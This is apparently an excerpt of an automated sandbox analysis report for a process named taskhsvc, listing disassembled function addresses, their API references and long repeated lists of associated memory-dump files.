    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00260A6B, Relevance: 1.5, APIs: 1, Instructions: 27
    APIs
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00268186), ref: 00260ABA
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001C5FA6, Relevance: 1.5, APIs: 1, Instructions: 27
    APIs
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 001C7086: event_new.LIBEVENT-2-0-5 ref: 001C7114
      • Part of subcall function 001C7086: event_add.LIBEVENT-2-0-5 ref: 001C714C
      • Part of subcall function 001C7086: event_new.LIBEVENT-2-0-5 ref: 001C71CC
      • Part of subcall function 001C7086: __stack_chk_fail.LIBSSP-0 ref: 001C7211
      • Part of subcall function 002581BD: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,001C6001), ref: 002581E5
    • __stack_chk_fail.LIBSSP-0 ref: 001C63EC
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00316F50, Relevance: 1.5, APIs: 1, Instructions: 27
    APIs
      • Part of subcall function 00316FAD: socket.WS2_32 ref: 0031701F
      • Part of subcall function 00316FAD: __stack_chk_fail.LIBSSP-0 ref: 00317080
    • __stack_chk_fail.LIBSSP-0 ref: 00316FA6
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001DC72F, Relevance: 1.5, APIs: 1, Instructions: 27
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002BF9A6, Relevance: 1.5, APIs: 1, Instructions: 25
    APIs
      • Part of subcall function 002BF9F0: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,002BF9BB), ref: 002BFA9D
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,002C18A7), ref: 002BF9E9
      • Part of subcall function 002C0435: free.MSVCRT ref: 002C059D
      • Part of subcall function 002C0435: __stack_chk_fail.LIBSSP-0 ref: 002C05F7
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001C48E8, Relevance: 1.5, APIs: 1, Instructions: 24
    APIs
      • Part of subcall function 002A622F: __stack_chk_fail.LIBSSP-0 ref: 002A635C
      • Part of subcall function 002A6394: __stack_chk_fail.LIBSSP-0 ref: 002A6427
      • Part of subcall function 001C2D88: __stack_chk_fail.LIBSSP-0 ref: 001C2DFB
      • Part of subcall function 00274695: __stack_chk_fail.LIBSSP-0 ref: 00274746
      • Part of subcall function 0025B0C8: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,0025A37E,?,?,?,?,?,?,?,?,?,0025A412), ref: 0025B107
    • __stack_chk_fail.LIBSSP-0 ref: 001C4935
      • Part of subcall function 002A8ABB: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,002B3C20), ref: 002A8AF4
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002B2C5F, Relevance: 1.5, APIs: 1, Instructions: 21
    APIs
      • Part of subcall function 002B2B73: __stack_chk_fail.LIBSSP-0 ref: 002B2C58
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00233A48), ref: 002B2C98
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0033202E, Relevance: 1.5, APIs: 1, Instructions: 20
    APIs
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313FDC), ref: 00332060
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
